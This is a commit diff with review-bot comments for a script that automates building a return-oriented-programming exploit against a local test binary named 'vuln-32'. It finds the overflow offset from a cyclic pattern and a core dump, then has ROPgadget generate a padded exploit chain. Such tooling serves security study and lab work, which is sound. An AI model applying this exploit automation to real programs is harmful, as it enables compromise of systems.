Run ROPGadget with auto offset

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
Liam Dalgarno 2020-11-25 15:38:08 +00:00
parent a8cbc66faf
commit 688bb5a1be
2 changed files with 31 additions and 13 deletions


@ -9,6 +9,7 @@ sudo apt-get --quiet --assume-yes install gcc-multilib
sudo apt-get --quiet --assume-yes install zsh sudo apt-get --quiet --assume-yes install zsh
sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev
sudo apt-get --assume-yes --quiet install python
python3 -m pip install --upgrade pip python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools python3 -m pip install --upgrade pwntools
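Review bot: The added `sudo apt-get --assume-yes --quiet install python` line gives no hint why a second interpreter is needed next to the python3 installed two lines earlier, and on distributions that no longer ship an unversioned `python` package apt-get exits non-zero at this step, which a maintainer cannot diagnose without knowing what consumes it. A one-line comment such as `# unversioned python package — TODO: state which tool below requires it` would let the line be kept or dropped safely. The neighbouring lines use `--quiet --assume-yes`; matching that flag order would keep the script consistent.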


@ -2,11 +2,15 @@ from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack from pwnlib.util.packing import pack
from pwnlib.tubes.process import process from pwnlib.tubes.process import process
import os
import os
import subprocess
exec_name = "./vuln-32"
def find_offset(exec_name):
# TODO: command line arguments # TODO: command line arguments
input_file = "input.txt" input_file = "input.txt"
exec_name = "./vuln-32"
core_file = "./core" core_file = "./core"
os.remove(core_file) os.remove(core_file)
@ -22,6 +26,19 @@ core = Coredump('./core')
assert pack(core.eip) in payload assert pack(core.eip) in payload
print(cyclic_find(core.eip))
os.remove(input_file) os.remove(input_file)
return cyclic_find(core.eip)
offset = find_offset(exec_name)
# print("\t# Padding goes here") <-- search for this
# print("\tp = ''\n")
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
stdout = result.stdout
stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n")
with open("test.py", "wb") as f:
f.write(stdout)
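Review bot: The `stdout.replace(b"p = ''\n", …)` on the new side silently leaves test.py without any padding when ROPgadget's output does not contain that exact placeholder, and `subprocess.run` is called without `check=True`, so a missing or failing ROPgadget yields an empty `result.stdout` that is still written to test.py as if it were a valid chain. Both cases should stop the script rather than emit a broken file, and `bytes('a' * offset, 'ascii')` is simply `b"a" * offset`. The commented-out lines `# print("\t# Padding goes here") <-- search for this` and `# print("\tp = ''\n")` read as scratch notes; replace them with one real comment stating that `p = ''` is the placeholder line ROPgadget emits in its generated chain, or drop them. The module-level statements from `offset = find_offset(exec_name)` to the write run on import; guarding them with `if __name__ == "__main__":` is a small follow-up. `find_offset` itself begins outside this hunk.
```python
result = subprocess.run(
    ["ROPgadget", "--binary", exec_name, "--ropchain"],
    stdout=subprocess.PIPE,
    check=True,  # a missing or failing ROPgadget must not produce an empty test.py
)
# ROPgadget's generated chain starts with an empty "p = ''" line; the padding replaces it.
marker = b"p = ''\n"
if marker not in result.stdout:
    raise RuntimeError("ROPgadget output lacks the padding placeholder line")
stdout = result.stdout.replace(marker, b'p = "' + b"a" * offset + b'"\n')
# … unchanged: write stdout to test.py …
```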